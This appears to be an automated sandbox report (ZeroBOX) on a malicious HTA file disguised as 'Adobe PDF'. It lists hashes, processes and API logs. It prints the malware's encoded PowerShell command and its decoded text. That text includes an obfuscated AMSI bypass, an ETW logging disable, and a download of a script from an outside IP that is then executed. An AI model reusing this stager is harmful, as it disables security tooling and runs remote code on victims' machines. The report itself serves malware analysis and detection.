Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 30, 2025, 1:55 p.m.	April 30, 2025, 1:57 p.m.

Size	3.7KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`5caf6a496b1b5ee03fe694309045fbb8`
SHA256	`1a04d1ee622b3288437eeb038f8832f277d41eca706a1a4887d80c296047251f`
CRC32	`F63530D0`
ssdeep	`96:3y2iJsUOJnSgNSu340c3MU4L8o+lci4l/Jxk3OQS0JgykZhJx7hBP5ui:C2iJsUOJnSgNSms/Inv0JgyUhJx7hBPB`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\Adobe%20PDF.hta
2548
- powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded "UwBlAHQALQBQAFMAUgBlAGEAZABMAGkAbgBlAE8AcAB0AGkAbwBuACAALQBIAGkAcwB0AG8AcgB5AFMAYQB2AGUAUwB0AHkAbABlACAAJwBTAGEAdgBlAE4AbwB0AGgAaQBuAGcAJwA7ADsAOwA7ADsAOwA7ADsAOwAsACwAJABhACAAPQAgADQAMgA7ACAAJABiACAAPQAgACIAYgBhAG4AYQBuAGEAIgA7ACAAJABjACAAPQAgAEAAKAApADsAIAAkAGQAIAA9ACAAJAB0AHIAdQBlADsAIAAkAGUAIAA9ACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACkAOwAgACQAZgAgAD0AIAAiACIAOwAgACQAZwAgAD0AIAAzAC4AMQA0ADEANQA7ACAAJABoACAAPQAgAEAAewB4AD0AMQA7AHkAPQAyAH0AOwAgACQAaQAgAD0AIAAkAG4AdQBsAGwAOwAgACQAagAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARwB1AGkAZABdADoAOgBOAGUAdwBHAHUAaQBkACgAKQA7ACAAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdABpAGEAbABpAHoAZQAtAFMAeQBzAHQAZQBtACAAewB9ACAAZgB1AG4AYwB0AGkAbwBuACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAAgAHsAfQAgAGYAdQBuAGMAdABpAG8AbgAgAEUAbgBnAGEAZwBlAC0AUQB1AGEAbgB0AHUAbQBEAHIAaQB2AGUAIAB7AH0AIABmAHUAbgBjAHQAaQBvAG4AIABTAHkAbgBjAC0ATQB1AGwAdABpAHYAZQByAHMAZQAgAHsAfQAgAEkAbgBpAHQAaQBhAGwAaQB6AGUALQBTAHkAcwB0AGUAbQA7ACAAQwBhAGwAaQBiAHIAYQB0AGUALQBNAGEAdAByAGkAeAA7ACAARQBuAGcAYQBnAGUALQBRAHUAYQBuAHQAdQBtAEQAcgBpAHYAZQA7ACAAUwB5AG4AYwAtAE0AdQBsAHQAaQB2AGUAcgBzAGUAOwA7ADsAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADsAWwBSAGUARgBdAC4AIgBgAEEAJAAoAGUAYwBoAG8AIABzAHMAZQApAGAAbQBCACQAKABlAGMAaABvACAATAApAGAAWQAiAC4AIgBnAGAARQAkACgAZQBjAGgAbwAgAHQAdAB5ACkAcABgAEUAIgAoACgAIAAiAFMAeQB7ADMAfQBhAG4AYQB7ADEAfQB1AHQAewA0AH0AdABpAHsAMgB9AHsAMAB9AGkAbABzACIAIAAtAGYAJwBpAFUAdAAnACwAJwBnAGUAbQBlAG4AdAAuAEEAJwAsACIAbwBuAC4AQQBtAGAAcwAiACwAJwBzAHQAZQBtAC4ATQAnACwAJwBvAG0AYQAnACkAIAApAC4AIgAkACgAZQBjAGgAbwAgAGcAZQApAGAAVABmAGAAaQAkACgAZQBjAGgAbwAgAEUAbAApAEQAIgAoACgAIgB7ADAAfQB7ADIAfQBuAGkAewAxAH0AaQBsAGUAZAAiACAALQBmACcAYQBtACcALAAnAHQARgBhACcALAAiAGAAcwBpAEkAIgApACwAKAAiAHsAMgB9AHUAYgBsAHsAMAB9AGAALAB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBpAGMAJwAsACcAUwB0AGEAdAAnACwAJwBOAG8AbgBQACcAKQApAC4AIgAkACgAZQBjAGgAbwAgAFMAZQApAHQAYABWAGEAJAAoAGUAYwBoAG8AIABMAFUARQApACIAKAAkACgAKQAsACQAKAAxACAALQBlAHEAIAAxACkAKQA7ACgAKAB7AH0AKQAuAGcAZQB0AHQAeQBwAGUAKAApACkALgAiAGEAUwBzAGAAZQBtAGIAbABZACIALgAiAEcAZQB0AHQAeQBgAFAARQAiACgAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAJwArACcAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQAnACsAJwBvAG4ALgBUAHIAYQBjACcAKwAnAGkAbgBnAC4AUAAnACsAJwBTAEUAdAB3AEwAJwArACcAbwBnACcAKwAnAFAAcgBvACcAKwAnAHYAaQAnACsAJwBkACcAKwAnAGUAJwArACcAcgAnACkAKQAuACIAZwBFAHQAZgBgAGkAZQBMAEQAIgAoACgAJwBlAHQAdwBQAHIAbwB2AGkAJwArACcAZABlACcAKwAnAHIAJwApACwAKAAnAE4AbwBuACcAKwAnAFAAJwArACcAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApACkALgAiAFMAZQBgAFQAVgBBAEwAYABVAGUAIgAoACQAbgB1AGwAbAAsACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4ARQB2AGUAbgB0AGkAbgBnAC4ARQB2AGUAbgB0AFAAcgBvAHYAaQBkAGUAcgAoAE4AZQB3AC0ARwB1AGkAZAApACkAKQA7ACQAdwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgB3AGUAYgByAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJwBoAHQAdABwADoALwAvADgAMwAuADEAMwA4AC4ANQAzAC4AMQA4ADYALwAxAC4AdAB4AHQAJwApADsAJAByAD0AJAB3AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAcwA9ACQAcgAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAOwAkAGUAPQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAXQA6ADoAbgBlAHcAKAAkAHMAKQA7ACQAYwA9ACQAZQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACYAKAAnACcALgBTAHUAYgBTAHQAcgBpAG4AZwAuAFQAbwBTAHQAcgBpAG4AZwAoACkAWwA2ADcALAA3ADIALAA2ADQAXQAtAEoAbwBpAG4AJwAnACkAJABjAA=="
  2648

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2025, 1:55 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 30, 2025, 1:55 p.m.			0	0

Command line console output was observed (21 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: At line:1 char:486 console_handle: 0x0000002f	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: + Set-PSReadLineOption -HistorySaveStyle 'SaveNothing';;;;;;;;;,,$a = 42; $b = console_handle: 0x0000003b	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: "banana"; $c = @(); $d = $true; $e = (Get-Random); $f = ""; $g = 3.1415; $h = @ console_handle: 0x00000047	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: {x=1;y=2}; $i = $null; $j = [System.Guid]::NewGuid(); function Initialize-Syste console_handle: 0x00000053	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: m {} function Calibrate-Matrix {} function Engage-QuantumDrive {} function Sync console_handle: 0x0000005f	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: -Multiverse {} Initialize-System; Calibrate-Matrix; Engage-QuantumDrive; Sync-M console_handle: 0x0000006b	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: ultiverse;;;;Start-Sleep -Seconds 1;[ReF]."`A$(echo sse)`mB$(echo L)`Y"."g`E$(e console_handle: 0x00000077	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: cho tty)p`E"( <<<< ( "Sy{3}ana{1}ut{4}ti{2}{0}ils" -f'iUt','gement.A',"on.Am`s" console_handle: 0x00000083	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: ,'stem.M','oma') )."$(echo ge)`Tf`i$(echo El)D"(("{0}{2}ni{1}iled" -f'am','tFa' console_handle: 0x0000008f	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: ,"`siI"),("{2}ubl{0}`,{1}{0}" -f 'ic','Stat','NonP'))."$(echo Se)t`Va$(echo LUE console_handle: 0x0000009b	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: )"($(),$(1 -eq 1));(({}).gettype())."aSs`emblY"."Getty`PE"(('System.Manage'+'me console_handle: 0x000000a7	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: nt.Automati'+'on.Trac'+'ing.P'+'SEtwL'+'og'+'Pro'+'vi'+'d'+'e'+'r'))."gEtf`ieLD console_handle: 0x000000b3	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: "(('etwProvi'+'de'+'r'),('Non'+'P'+'ublic,Static'))."Se`TVAL`Ue"($null,(New-Obj console_handle: 0x000000bf	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: ect System.Diagnostics.Eventing.EventProvider(New-Guid)));$w = [System.Net.webr console_handle: 0x000000cb	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: equest]::Create('http://83.138.53.186/1.txt');$r=$w.GetResponse();$s=$r.GetResp console_handle: 0x000000d7	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: onseStream();$e=[System.IO.StreamReader]::new($s);$c=$e.ReadToEnd();;Start-Slee console_handle: 0x000000e3	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: p -Seconds 2;&(''.SubString.ToString()[67,72,64]-Join'')$c console_handle: 0x000000ef	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x000000fb	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: ecordException console_handle: 0x00000107	1	1
WriteConsoleW April 30, 2025, 1:55 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x00000113	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003846c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003847c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384288 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384b48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00384c48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003843c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 30, 2025, 1:55 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00385048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 30, 2025, 1:55 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2548 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f65000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2025, 1:55 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
